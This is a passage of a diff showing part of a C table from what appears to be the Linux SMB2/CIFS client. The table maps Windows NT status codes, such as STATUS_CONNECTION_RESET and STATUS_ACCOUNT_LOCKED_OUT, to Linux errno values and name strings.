+-	{STATUS_TRUSTED_RELATIONSHIP_FAILURE, -EIO,
+-	"STATUS_TRUSTED_RELATIONSHIP_FAILURE"},
+-	{STATUS_EVENTLOG_FILE_CORRUPT, -EIO, "STATUS_EVENTLOG_FILE_CORRUPT"},
+-	{STATUS_EVENTLOG_CANT_START, -EIO, "STATUS_EVENTLOG_CANT_START"},
+-	{STATUS_TRUST_FAILURE, -EIO, "STATUS_TRUST_FAILURE"},
+-	{STATUS_MUTANT_LIMIT_EXCEEDED, -EIO, "STATUS_MUTANT_LIMIT_EXCEEDED"},
+-	{STATUS_NETLOGON_NOT_STARTED, -EIO, "STATUS_NETLOGON_NOT_STARTED"},
+-	{STATUS_ACCOUNT_EXPIRED, -EKEYEXPIRED, "STATUS_ACCOUNT_EXPIRED"},
+-	{STATUS_POSSIBLE_DEADLOCK, -EIO, "STATUS_POSSIBLE_DEADLOCK"},
+-	{STATUS_NETWORK_CREDENTIAL_CONFLICT, -EIO,
+-	"STATUS_NETWORK_CREDENTIAL_CONFLICT"},
+-	{STATUS_REMOTE_SESSION_LIMIT, -EIO, "STATUS_REMOTE_SESSION_LIMIT"},
+-	{STATUS_EVENTLOG_FILE_CHANGED, -EIO, "STATUS_EVENTLOG_FILE_CHANGED"},
+-	{STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT, -EIO,
+-	"STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT"},
+-	{STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT, -EIO,
+-	"STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT"},
+-	{STATUS_NOLOGON_SERVER_TRUST_ACCOUNT, -EIO,
+-	"STATUS_NOLOGON_SERVER_TRUST_ACCOUNT"},
+-	{STATUS_DOMAIN_TRUST_INCONSISTENT, -EIO,
+-	"STATUS_DOMAIN_TRUST_INCONSISTENT"},
+-	{STATUS_FS_DRIVER_REQUIRED, -EOPNOTSUPP, "STATUS_FS_DRIVER_REQUIRED"},
+-	{STATUS_IMAGE_ALREADY_LOADED_AS_DLL, -EIO,
+-	"STATUS_IMAGE_ALREADY_LOADED_AS_DLL"},
+-	{STATUS_NETWORK_OPEN_RESTRICTION, -EIO,
+-	"STATUS_NETWORK_OPEN_RESTRICTION"},
+-	{STATUS_NO_USER_SESSION_KEY, -EIO, "STATUS_NO_USER_SESSION_KEY"},
+-	{STATUS_USER_SESSION_DELETED, -EIO, "STATUS_USER_SESSION_DELETED"},
+-	{STATUS_RESOURCE_LANG_NOT_FOUND, -EIO,
+-	"STATUS_RESOURCE_LANG_NOT_FOUND"},
+-	{STATUS_INSUFF_SERVER_RESOURCES, -EIO,
+-	"STATUS_INSUFF_SERVER_RESOURCES"},
+-	{STATUS_INVALID_BUFFER_SIZE, -EIO, "STATUS_INVALID_BUFFER_SIZE"},
+-	{STATUS_INVALID_ADDRESS_COMPONENT, -EIO,
+-	"STATUS_INVALID_ADDRESS_COMPONENT"},
+-	{STATUS_INVALID_ADDRESS_WILDCARD, -EIO,
+-	"STATUS_INVALID_ADDRESS_WILDCARD"},
+-	{STATUS_TOO_MANY_ADDRESSES, -EIO, "STATUS_TOO_MANY_ADDRESSES"},
+-	{STATUS_ADDRESS_ALREADY_EXISTS, -EADDRINUSE,
+-	"STATUS_ADDRESS_ALREADY_EXISTS"},
+-	{STATUS_ADDRESS_CLOSED, -EIO, "STATUS_ADDRESS_CLOSED"},
+-	{STATUS_CONNECTION_DISCONNECTED, -ECONNABORTED,
+-	"STATUS_CONNECTION_DISCONNECTED"},
+-	{STATUS_CONNECTION_RESET, -ENETRESET, "STATUS_CONNECTION_RESET"},
+-	{STATUS_TOO_MANY_NODES, -EIO, "STATUS_TOO_MANY_NODES"},
+-	{STATUS_TRANSACTION_ABORTED, -EIO, "STATUS_TRANSACTION_ABORTED"},
+-	{STATUS_TRANSACTION_TIMED_OUT, -EIO, "STATUS_TRANSACTION_TIMED_OUT"},
+-	{STATUS_TRANSACTION_NO_RELEASE, -EIO, "STATUS_TRANSACTION_NO_RELEASE"},
+-	{STATUS_TRANSACTION_NO_MATCH, -EIO, "STATUS_TRANSACTION_NO_MATCH"},
+-	{STATUS_TRANSACTION_RESPONDED, -EIO, "STATUS_TRANSACTION_RESPONDED"},
+-	{STATUS_TRANSACTION_INVALID_ID, -EIO, "STATUS_TRANSACTION_INVALID_ID"},
+-	{STATUS_TRANSACTION_INVALID_TYPE, -EIO,
+-	"STATUS_TRANSACTION_INVALID_TYPE"},
+-	{STATUS_NOT_SERVER_SESSION, -EIO, "STATUS_NOT_SERVER_SESSION"},
+-	{STATUS_NOT_CLIENT_SESSION, -EIO, "STATUS_NOT_CLIENT_SESSION"},
+-	{STATUS_CANNOT_LOAD_REGISTRY_FILE, -EIO,
+-	"STATUS_CANNOT_LOAD_REGISTRY_FILE"},
+-	{STATUS_DEBUG_ATTACH_FAILED, -EIO, "STATUS_DEBUG_ATTACH_FAILED"},
+-	{STATUS_SYSTEM_PROCESS_TERMINATED, -EIO,
+-	"STATUS_SYSTEM_PROCESS_TERMINATED"},
+-	{STATUS_DATA_NOT_ACCEPTED, -EIO, "STATUS_DATA_NOT_ACCEPTED"},
+-	{STATUS_NO_BROWSER_SERVERS_FOUND, -EIO,
+-	"STATUS_NO_BROWSER_SERVERS_FOUND"},
+-	{STATUS_VDM_HARD_ERROR, -EIO, "STATUS_VDM_HARD_ERROR"},
+-	{STATUS_DRIVER_CANCEL_TIMEOUT, -EIO, "STATUS_DRIVER_CANCEL_TIMEOUT"},
+-	{STATUS_REPLY_MESSAGE_MISMATCH, -EIO, "STATUS_REPLY_MESSAGE_MISMATCH"},
+-	{STATUS_MAPPED_ALIGNMENT, -EIO, "STATUS_MAPPED_ALIGNMENT"},
+-	{STATUS_IMAGE_CHECKSUM_MISMATCH, -EIO,
+-	"STATUS_IMAGE_CHECKSUM_MISMATCH"},
+-	{STATUS_LOST_WRITEBEHIND_DATA, -EIO, "STATUS_LOST_WRITEBEHIND_DATA"},
+-	{STATUS_CLIENT_SERVER_PARAMETERS_INVALID, -EIO,
+-	"STATUS_CLIENT_SERVER_PARAMETERS_INVALID"},
+-	{STATUS_PASSWORD_MUST_CHANGE, -EIO, "STATUS_PASSWORD_MUST_CHANGE"},
+-	{STATUS_NOT_FOUND, -ENOENT, "STATUS_NOT_FOUND"},
+-	{STATUS_NOT_TINY_STREAM, -EIO, "STATUS_NOT_TINY_STREAM"},
+-	{STATUS_RECOVERY_FAILURE, -EIO, "STATUS_RECOVERY_FAILURE"},
+-	{STATUS_STACK_OVERFLOW_READ, -EIO, "STATUS_STACK_OVERFLOW_READ"},
+-	{STATUS_FAIL_CHECK, -EIO, "STATUS_FAIL_CHECK"},
+-	{STATUS_DUPLICATE_OBJECTID, -EIO, "STATUS_DUPLICATE_OBJECTID"},
+-	{STATUS_OBJECTID_EXISTS, -EIO, "STATUS_OBJECTID_EXISTS"},
+-	{STATUS_CONVERT_TO_LARGE, -EIO, "STATUS_CONVERT_TO_LARGE"},
+-	{STATUS_RETRY, -EAGAIN, "STATUS_RETRY"},
+-	{STATUS_FOUND_OUT_OF_SCOPE, -EIO, "STATUS_FOUND_OUT_OF_SCOPE"},
+-	{STATUS_ALLOCATE_BUCKET, -EIO, "STATUS_ALLOCATE_BUCKET"},
+-	{STATUS_PROPSET_NOT_FOUND, -EIO, "STATUS_PROPSET_NOT_FOUND"},
+-	{STATUS_MARSHALL_OVERFLOW, -EIO, "STATUS_MARSHALL_OVERFLOW"},
+-	{STATUS_INVALID_VARIANT, -EIO, "STATUS_INVALID_VARIANT"},
+-	{STATUS_DOMAIN_CONTROLLER_NOT_FOUND, -EIO,
+-	"STATUS_DOMAIN_CONTROLLER_NOT_FOUND"},
+-	{STATUS_ACCOUNT_LOCKED_OUT, -EACCES, "STATUS_ACCOUNT_LOCKED_OUT"},
+-	{STATUS_HANDLE_NOT_CLOSABLE, -EIO, "STATUS_HANDLE_NOT_CLOSABLE"},
+-	{STATUS_CONNECTION_REFUSED, -EIO, "STATUS_CONNECTION_REFUSED"},
+-	{STATUS_GRACEFUL_DISCONNECT, -EIO, "STATUS_GRACEFUL_DISCONNECT"},
+-	{STATUS_ADDRESS_ALREADY_ASSOCIATED, -EIO,
+-	"STATUS_ADDRESS_ALREADY_ASSOCIATED"},
+-	{STATUS_ADDRESS_NOT_ASSOCIATED, -EIO, "STATUS_ADDRESS_NOT_ASSOCIATED"},
+-	{STATUS_CONNECTION_INVALID, -EIO, "STATUS_CONNECTION_INVALID"},
+-	{STATUS_CONNECTION_ACTIVE, -EIO, "STATUS_CONNECTION_ACTIVE"},
+-	{STATUS_NETWORK_UNREACHABLE, -ENETUNREACH,
+-	"STATUS_NETWORK_UNREACHABLE"},
+-	{STATUS_HOST_UNREACHABLE, -EHOSTDOWN, "STATUS_HOST_UNREACHABLE"},
+-	{STATUS_PROTOCOL_UNREACHABLE, -ENETUNREACH,
+-	"STATUS_PROTOCOL_UNREACHABLE"},
+-	{STATUS_PORT_UNREACHABLE, -ENETUNREACH, "STATUS_PORT_UNREACHABLE"},
+-	{STATUS_REQUEST_ABORTED, -EIO, "STATUS_REQUEST_ABORTED"},
+-	{STATUS_CONNECTION_ABORTED, -ECONNABORTED, "STATUS_CONNECTION_ABORTED"},
+-	{STATUS_BAD_COMPRESSION_BUFFER, -EIO, "STATUS_BAD_COMPRESSION_BUFFER"},
+-	{STATUS_USER_MAPPED_FILE, -EIO, "STATUS_USER_MAPPED_FILE"},
+-	{STATUS_AUDIT_FAILED, -EIO, "STATUS_AUDIT_FAILED"},
+-	{STATUS_TIMER_RESOLUTION_NOT_SET, -EIO,
+-	"STATUS_TIMER_RESOLUTION_NOT_SET"},
+-	{STATUS_CONNECTION_COUNT_LIMIT, -EIO, "STATUS_CONNECTION_COUNT_LIMIT"},
+-	{STATUS_LOGIN_TIME_RESTRICTION, -EACCES,
+-	"STATUS_LOGIN_TIME_RESTRICTION"},
+-	{STATUS_LOGIN_WKSTA_RESTRICTION, -EACCES,
+-	"STATUS_LOGIN_WKSTA_RESTRICTION"},
+-	{STATUS_IMAGE_MP_UP_MISMATCH, -EIO, "STATUS_IMAGE_MP_UP_MISMATCH"},
+-	{STATUS_INSUFFICIENT_LOGON_INFO, -EIO,
+-	"STATUS_INSUFFICIENT_LOGON_INFO"},
+-	{STATUS_BAD_DLL_ENTRYPOINT, -EIO, "STATUS_BAD_DLL_ENTRYPOINT"},
+-	{STATUS_BAD_SERVICE_ENTRYPOINT, -EIO, "STATUS_BAD_SERVICE_ENTRYPOINT"},
+-	{STATUS_LPC_REPLY_LOST, -EIO, "STATUS_LPC_REPLY_LOST"},
+-	{STATUS_IP_ADDRESS_CONFLICT1, -EIO, "STATUS_IP_ADDRESS_CONFLICT1"},
+-	{STATUS_IP_ADDRESS_CONFLICT2, -EIO, "STATUS_IP_ADDRESS_CONFLICT2"},
+-	{STATUS_REGISTRY_QUOTA_LIMIT, -EDQUOT, "STATUS_REGISTRY_QUOTA_LIMIT"},
+-	{STATUS_PATH_NOT_COVERED, -EREMOTE, "STATUS_PATH_NOT_COVERED"},
+-	{STATUS_NO_CALLBACK_ACTIVE, -EIO, "STATUS_NO_CALLBACK_ACTIVE"},
+-	{STATUS_LICENSE_QUOTA_EXCEEDED, -EACCES,
+-	"STATUS_LICENSE_QUOTA_EXCEEDED"},
+-	{STATUS_PWD_TOO_SHORT, -EIO, "STATUS_PWD_TOO_SHORT"},
+-	{STATUS_PWD_TOO_RECENT, -EIO, "STATUS_PWD_TOO_RECENT"},
+-	{STATUS_PWD_HISTORY_CONFLICT, -EIO, "STATUS_PWD_HISTORY_CONFLICT"},
+-	{STATUS_PLUGPLAY_NO_DEVICE, -EIO, "STATUS_PLUGPLAY_NO_DEVICE"},
+-	{STATUS_UNSUPPORTED_COMPRESSION, -EIO,
+-	"STATUS_UNSUPPORTED_COMPRESSION"},
+-	{STATUS_INVALID_HW_PROFILE, -EIO, "STATUS_INVALID_HW_PROFILE"},
+-	{STATUS_INVALID_PLUGPLAY_DEVICE_PATH, -EIO,
+-	"STATUS_INVALID_PLUGPLAY_DEVICE_PATH"},
+-	{STATUS_DRIVER_ORDINAL_NOT_FOUND, -EIO,
+-	"STATUS_DRIVER_ORDINAL_NOT_FOUND"},
+-	{STATUS_DRIVER_ENTRYPOINT_NOT_FOUND, -EIO,
+-	"STATUS_DRIVER_ENTRYPOINT_NOT_FOUND"},
+-	{STATUS_RESOURCE_NOT_OWNED, -EIO, "STATUS_RESOURCE_NOT_OWNED"},
+-	{STATUS_TOO_MANY_LINKS, -EMLINK, "STATUS_TOO_MANY_LINKS"},
+-	{STATUS_QUOTA_LIST_INCONSISTENT, -EIO,
+-	"STATUS_QUOTA_LIST_INCONSISTENT"},
+-	{STATUS_FILE_IS_OFFLINE, -EIO, "STATUS_FILE_IS_OFFLINE"},
+-	{STATUS_EVALUATION_EXPIRATION, -EIO, "STATUS_EVALUATION_EXPIRATION"},
+-	{STATUS_ILLEGAL_DLL_RELOCATION, -EIO, "STATUS_ILLEGAL_DLL_RELOCATION"},
+-	{STATUS_LICENSE_VIOLATION, -EIO, "STATUS_LICENSE_VIOLATION"},
+-	{STATUS_DLL_INIT_FAILED_LOGOFF, -EIO, "STATUS_DLL_INIT_FAILED_LOGOFF"},
+-	{STATUS_DRIVER_UNABLE_TO_LOAD, -EIO, "STATUS_DRIVER_UNABLE_TO_LOAD"},
+-	{STATUS_DFS_UNAVAILABLE, -EIO, "STATUS_DFS_UNAVAILABLE"},
+-	{STATUS_VOLUME_DISMOUNTED, -EIO, "STATUS_VOLUME_DISMOUNTED"},
+-	{STATUS_WX86_INTERNAL_ERROR, -EIO, "STATUS_WX86_INTERNAL_ERROR"},
+-	{STATUS_WX86_FLOAT_STACK_CHECK, -EIO, "STATUS_WX86_FLOAT_STACK_CHECK"},
+-	{STATUS_VALIDATE_CONTINUE, -EIO, "STATUS_VALIDATE_CONTINUE"},
+-	{STATUS_NO_MATCH, -EIO, "STATUS_NO_MATCH"},
+-	{STATUS_NO_MORE_MATCHES, -EIO, "STATUS_NO_MORE_MATCHES"},
+-	{STATUS_NOT_A_REPARSE_POINT, -EIO, "STATUS_NOT_A_REPARSE_POINT"},
+-	{STATUS_IO_REPARSE_TAG_INVALID, -EIO, "STATUS_IO_REPARSE_TAG_INVALID"},
+-	{STATUS_IO_REPARSE_TAG_MISMATCH, -EIO,
+-	"STATUS_IO_REPARSE_TAG_MISMATCH"},
+-	{STATUS_IO_REPARSE_DATA_INVALID, -EIO,
+-	"STATUS_IO_REPARSE_DATA_INVALID"},
+-	{STATUS_IO_REPARSE_TAG_NOT_HANDLED, -EIO,
+-	"STATUS_IO_REPARSE_TAG_NOT_HANDLED"},
+-	{STATUS_REPARSE_POINT_NOT_RESOLVED, -EIO,
+-	"STATUS_REPARSE_POINT_NOT_RESOLVED"},
+-	{STATUS_DIRECTORY_IS_A_REPARSE_POINT, -EIO,
+-	"STATUS_DIRECTORY_IS_A_REPARSE_POINT"},
+-	{STATUS_RANGE_LIST_CONFLICT, -EIO, "STATUS_RANGE_LIST_CONFLICT"},
+-	{STATUS_SOURCE_ELEMENT_EMPTY, -EIO, "STATUS_SOURCE_ELEMENT_EMPTY"},
+-	{STATUS_DESTINATION_ELEMENT_FULL, -EIO,
+-	"STATUS_DESTINATION_ELEMENT_FULL"},
+-	{STATUS_ILLEGAL_ELEMENT_ADDRESS, -EIO,
+-	"STATUS_ILLEGAL_ELEMENT_ADDRESS"},
+-	{STATUS_MAGAZINE_NOT_PRESENT, -EIO, "STATUS_MAGAZINE_NOT_PRESENT"},
+-	{STATUS_REINITIALIZATION_NEEDED, -EIO,
+-	"STATUS_REINITIALIZATION_NEEDED"},
+-	{STATUS_ENCRYPTION_FAILED, -EIO, "STATUS_ENCRYPTION_FAILED"},
+-	{STATUS_DECRYPTION_FAILED, -EIO, "STATUS_DECRYPTION_FAILED"},
+-	{STATUS_RANGE_NOT_FOUND, -EIO, "STATUS_RANGE_NOT_FOUND"},
+-	{STATUS_NO_RECOVERY_POLICY, -EIO, "STATUS_NO_RECOVERY_POLICY"},
+-	{STATUS_NO_EFS, -EIO, "STATUS_NO_EFS"},
+-	{STATUS_WRONG_EFS, -EIO, "STATUS_WRONG_EFS"},
+-	{STATUS_NO_USER_KEYS, -EIO, "STATUS_NO_USER_KEYS"},
+-	{STATUS_FILE_NOT_ENCRYPTED, -EIO, "STATUS_FILE_NOT_ENCRYPTED"},
+-	{STATUS_NOT_EXPORT_FORMAT, -EIO, "STATUS_NOT_EXPORT_FORMAT"},
+-	{STATUS_FILE_ENCRYPTED, -EIO, "STATUS_FILE_ENCRYPTED"},
+-	{STATUS_WMI_GUID_NOT_FOUND, -EIO, "STATUS_WMI_GUID_NOT_FOUND"},
+-	{STATUS_WMI_INSTANCE_NOT_FOUND, -EIO, "STATUS_WMI_INSTANCE_NOT_FOUND"},
+-	{STATUS_WMI_ITEMID_NOT_FOUND, -EIO, "STATUS_WMI_ITEMID_NOT_FOUND"},
+-	{STATUS_WMI_TRY_AGAIN, -EIO, "STATUS_WMI_TRY_AGAIN"},
+-	{STATUS_SHARED_POLICY, -EIO, "STATUS_SHARED_POLICY"},
+-	{STATUS_POLICY_OBJECT_NOT_FOUND, -EIO,
+-	"STATUS_POLICY_OBJECT_NOT_FOUND"},
+-	{STATUS_POLICY_ONLY_IN_DS, -EIO, "STATUS_POLICY_ONLY_IN_DS"},
+-	{STATUS_VOLUME_NOT_UPGRADED, -EIO, "STATUS_VOLUME_NOT_UPGRADED"},
+-	{STATUS_REMOTE_STORAGE_NOT_ACTIVE, -EIO,
+-	"STATUS_REMOTE_STORAGE_NOT_ACTIVE"},
+-	{STATUS_REMOTE_STORAGE_MEDIA_ERROR, -EIO,
+-	"STATUS_REMOTE_STORAGE_MEDIA_ERROR"},
+-	{STATUS_NO_TRACKING_SERVICE, -EIO, "STATUS_NO_TRACKING_SERVICE"},
+-	{STATUS_SERVER_SID_MISMATCH, -EIO, "STATUS_SERVER_SID_MISMATCH"},
+-	{STATUS_DS_NO_ATTRIBUTE_OR_VALUE, -EIO,
+-	"STATUS_DS_NO_ATTRIBUTE_OR_VALUE"},
+-	{STATUS_DS_INVALID_ATTRIBUTE_SYNTAX, -EIO,
+-	"STATUS_DS_INVALID_ATTRIBUTE_SYNTAX"},
+-	{STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED, -EIO,
+-	"STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED"},
+-	{STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS, -EIO,
+-	"STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS"},
+-	{STATUS_DS_BUSY, -EBUSY, "STATUS_DS_BUSY"},
+-	{STATUS_DS_UNAVAILABLE, -EIO, "STATUS_DS_UNAVAILABLE"},
+-	{STATUS_DS_NO_RIDS_ALLOCATED, -EIO, "STATUS_DS_NO_RIDS_ALLOCATED"},
+-	{STATUS_DS_NO_MORE_RIDS, -EIO, "STATUS_DS_NO_MORE_RIDS"},
+-	{STATUS_DS_INCORRECT_ROLE_OWNER, -EIO,
+-	"STATUS_DS_INCORRECT_ROLE_OWNER"},
+-	{STATUS_DS_RIDMGR_INIT_ERROR, -EIO, "STATUS_DS_RIDMGR_INIT_ERROR"},
+-	{STATUS_DS_OBJ_CLASS_VIOLATION, -EIO, "STATUS_DS_OBJ_CLASS_VIOLATION"},
+-	{STATUS_DS_CANT_ON_NON_LEAF, -EIO, "STATUS_DS_CANT_ON_NON_LEAF"},
+-	{STATUS_DS_CANT_ON_RDN, -EIO, "STATUS_DS_CANT_ON_RDN"},
+-	{STATUS_DS_CANT_MOD_OBJ_CLASS, -EIO, "STATUS_DS_CANT_MOD_OBJ_CLASS"},
+-	{STATUS_DS_CROSS_DOM_MOVE_FAILED, -EIO,
+-	"STATUS_DS_CROSS_DOM_MOVE_FAILED"},
+-	{STATUS_DS_GC_NOT_AVAILABLE, -EIO, "STATUS_DS_GC_NOT_AVAILABLE"},
+-	{STATUS_DIRECTORY_SERVICE_REQUIRED, -EIO,
+-	"STATUS_DIRECTORY_SERVICE_REQUIRED"},
+-	{STATUS_REPARSE_ATTRIBUTE_CONFLICT, -EIO,
+-	"STATUS_REPARSE_ATTRIBUTE_CONFLICT"},
+-	{STATUS_CANT_ENABLE_DENY_ONLY, -EIO, "STATUS_CANT_ENABLE_DENY_ONLY"},
+-	{STATUS_FLOAT_MULTIPLE_FAULTS, -EIO, "STATUS_FLOAT_MULTIPLE_FAULTS"},
+-	{STATUS_FLOAT_MULTIPLE_TRAPS, -EIO, "STATUS_FLOAT_MULTIPLE_TRAPS"},
+-	{STATUS_DEVICE_REMOVED, -EIO, "STATUS_DEVICE_REMOVED"},
+-	{STATUS_JOURNAL_DELETE_IN_PROGRESS, -EIO,
+-	"STATUS_JOURNAL_DELETE_IN_PROGRESS"},
+-	{STATUS_JOURNAL_NOT_ACTIVE, -EIO, "STATUS_JOURNAL_NOT_ACTIVE"},
+-	{STATUS_NOINTERFACE, -EIO, "STATUS_NOINTERFACE"},
+-	{STATUS_DS_ADMIN_LIMIT_EXCEEDED, -EIO,
+-	"STATUS_DS_ADMIN_LIMIT_EXCEEDED"},
+-	{STATUS_DRIVER_FAILED_SLEEP, -EIO, "STATUS_DRIVER_FAILED_SLEEP"},
+-	{STATUS_MUTUAL_AUTHENTICATION_FAILED, -EIO,
+-	"STATUS_MUTUAL_AUTHENTICATION_FAILED"},
+-	{STATUS_CORRUPT_SYSTEM_FILE, -EIO, "STATUS_CORRUPT_SYSTEM_FILE"},
+-	{STATUS_DATATYPE_MISALIGNMENT_ERROR, -EIO,
+-	"STATUS_DATATYPE_MISALIGNMENT_ERROR"},
+-	{STATUS_WMI_READ_ONLY, -EROFS, "STATUS_WMI_READ_ONLY"},
+-	{STATUS_WMI_SET_FAILURE, -EIO, "STATUS_WMI_SET_FAILURE"},
+-	{STATUS_COMMITMENT_MINIMUM, -EIO, "STATUS_COMMITMENT_MINIMUM"},
+-	{STATUS_REG_NAT_CONSUMPTION, -EIO, "STATUS_REG_NAT_CONSUMPTION"},
+-	{STATUS_TRANSPORT_FULL, -EIO, "STATUS_TRANSPORT_FULL"},
+-	{STATUS_DS_SAM_INIT_FAILURE, -EIO, "STATUS_DS_SAM_INIT_FAILURE"},
+-	{STATUS_ONLY_IF_CONNECTED, -EIO, "STATUS_ONLY_IF_CONNECTED"},
+-	{STATUS_DS_SENSITIVE_GROUP_VIOLATION, -EIO,
+-	"STATUS_DS_SENSITIVE_GROUP_VIOLATION"},
+-	{STATUS_PNP_RESTART_ENUMERATION, -EIO,
+-	"STATUS_PNP_RESTART_ENUMERATION"},
+-	{STATUS_JOURNAL_ENTRY_DELETED, -EIO, "STATUS_JOURNAL_ENTRY_DELETED"},
+-	{STATUS_DS_CANT_MOD_PRIMARYGROUPID, -EIO,
+-	"STATUS_DS_CANT_MOD_PRIMARYGROUPID"},
+-	{STATUS_SYSTEM_IMAGE_BAD_SIGNATURE, -EIO,
+-	"STATUS_SYSTEM_IMAGE_BAD_SIGNATURE"},
+-	{STATUS_PNP_REBOOT_REQUIRED, -EIO, "STATUS_PNP_REBOOT_REQUIRED"},
+-	{STATUS_POWER_STATE_INVALID, -EIO, "STATUS_POWER_STATE_INVALID"},
+-	{STATUS_DS_INVALID_GROUP_TYPE, -EIO, "STATUS_DS_INVALID_GROUP_TYPE"},
+-	{STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN, -EIO,
+-	"STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN"},
+-	{STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN, -EIO,
+-	"STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN"},
+-	{STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER, -EIO,
+-	"STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER"},
+-	{STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER, -EIO,
+-	"STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER"},
+-	{STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER, -EIO,
+-	"STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER"},
+-	{STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER, -EIO,
+-	"STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER"},
+-	{STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER, -EIO,
+-	"STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER"},
+-	{STATUS_DS_HAVE_PRIMARY_MEMBERS, -EIO,
+-	"STATUS_DS_HAVE_PRIMARY_MEMBERS"},
+-	{STATUS_WMI_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_WMI_NOT_SUPPORTED"},
+-	{STATUS_INSUFFICIENT_POWER, -EIO, "STATUS_INSUFFICIENT_POWER"},
+-	{STATUS_SAM_NEED_BOOTKEY_PASSWORD, -EIO,
+-	"STATUS_SAM_NEED_BOOTKEY_PASSWORD"},
+-	{STATUS_SAM_NEED_BOOTKEY_FLOPPY, -EIO,
+-	"STATUS_SAM_NEED_BOOTKEY_FLOPPY"},
+-	{STATUS_DS_CANT_START, -EIO, "STATUS_DS_CANT_START"},
+-	{STATUS_DS_INIT_FAILURE, -EIO, "STATUS_DS_INIT_FAILURE"},
+-	{STATUS_SAM_INIT_FAILURE, -EIO, "STATUS_SAM_INIT_FAILURE"},
+-	{STATUS_DS_GC_REQUIRED, -EIO, "STATUS_DS_GC_REQUIRED"},
+-	{STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY, -EIO,
+-	"STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY"},
+-	{STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS, -EIO,
+-	"STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS"},
+-	{STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED, -EDQUOT,
+-	"STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED"},
+-	{STATUS_MULTIPLE_FAULT_VIOLATION, -EIO,
+-	"STATUS_MULTIPLE_FAULT_VIOLATION"},
+-	{STATUS_CURRENT_DOMAIN_NOT_ALLOWED, -EIO,
+-	"STATUS_CURRENT_DOMAIN_NOT_ALLOWED"},
+-	{STATUS_CANNOT_MAKE, -EIO, "STATUS_CANNOT_MAKE"},
+-	{STATUS_SYSTEM_SHUTDOWN, -EIO, "STATUS_SYSTEM_SHUTDOWN"},
+-	{STATUS_DS_INIT_FAILURE_CONSOLE, -EIO,
+-	"STATUS_DS_INIT_FAILURE_CONSOLE"},
+-	{STATUS_DS_SAM_INIT_FAILURE_CONSOLE, -EIO,
+-	"STATUS_DS_SAM_INIT_FAILURE_CONSOLE"},
+-	{STATUS_UNFINISHED_CONTEXT_DELETED, -EIO,
+-	"STATUS_UNFINISHED_CONTEXT_DELETED"},
+-	{STATUS_NO_TGT_REPLY, -EIO, "STATUS_NO_TGT_REPLY"},
+-	/* Note that ENOATTTR and ENODATA are the same errno */
+-	{STATUS_OBJECTID_NOT_FOUND, -ENODATA, "STATUS_OBJECTID_NOT_FOUND"},
+-	{STATUS_NO_IP_ADDRESSES, -EIO, "STATUS_NO_IP_ADDRESSES"},
+-	{STATUS_WRONG_CREDENTIAL_HANDLE, -EIO,
+-	"STATUS_WRONG_CREDENTIAL_HANDLE"},
+-	{STATUS_CRYPTO_SYSTEM_INVALID, -EIO, "STATUS_CRYPTO_SYSTEM_INVALID"},
+-	{STATUS_MAX_REFERRALS_EXCEEDED, -EIO, "STATUS_MAX_REFERRALS_EXCEEDED"},
+-	{STATUS_MUST_BE_KDC, -EIO, "STATUS_MUST_BE_KDC"},
+-	{STATUS_STRONG_CRYPTO_NOT_SUPPORTED, -EIO,
+-	"STATUS_STRONG_CRYPTO_NOT_SUPPORTED"},
+-	{STATUS_TOO_MANY_PRINCIPALS, -EIO, "STATUS_TOO_MANY_PRINCIPALS"},
+-	{STATUS_NO_PA_DATA, -EIO, "STATUS_NO_PA_DATA"},
+-	{STATUS_PKINIT_NAME_MISMATCH, -EIO, "STATUS_PKINIT_NAME_MISMATCH"},
+-	{STATUS_SMARTCARD_LOGON_REQUIRED, -EIO,
+-	"STATUS_SMARTCARD_LOGON_REQUIRED"},
+-	{STATUS_KDC_INVALID_REQUEST, -EIO, "STATUS_KDC_INVALID_REQUEST"},
+-	{STATUS_KDC_UNABLE_TO_REFER, -EIO, "STATUS_KDC_UNABLE_TO_REFER"},
+-	{STATUS_KDC_UNKNOWN_ETYPE, -EIO, "STATUS_KDC_UNKNOWN_ETYPE"},
+-	{STATUS_SHUTDOWN_IN_PROGRESS, -EIO, "STATUS_SHUTDOWN_IN_PROGRESS"},
+-	{STATUS_SERVER_SHUTDOWN_IN_PROGRESS, -EIO,
+-	"STATUS_SERVER_SHUTDOWN_IN_PROGRESS"},
+-	{STATUS_NOT_SUPPORTED_ON_SBS, -EOPNOTSUPP,
+-	"STATUS_NOT_SUPPORTED_ON_SBS"},
+-	{STATUS_WMI_GUID_DISCONNECTED, -EIO, "STATUS_WMI_GUID_DISCONNECTED"},
+-	{STATUS_WMI_ALREADY_DISABLED, -EIO, "STATUS_WMI_ALREADY_DISABLED"},
+-	{STATUS_WMI_ALREADY_ENABLED, -EIO, "STATUS_WMI_ALREADY_ENABLED"},
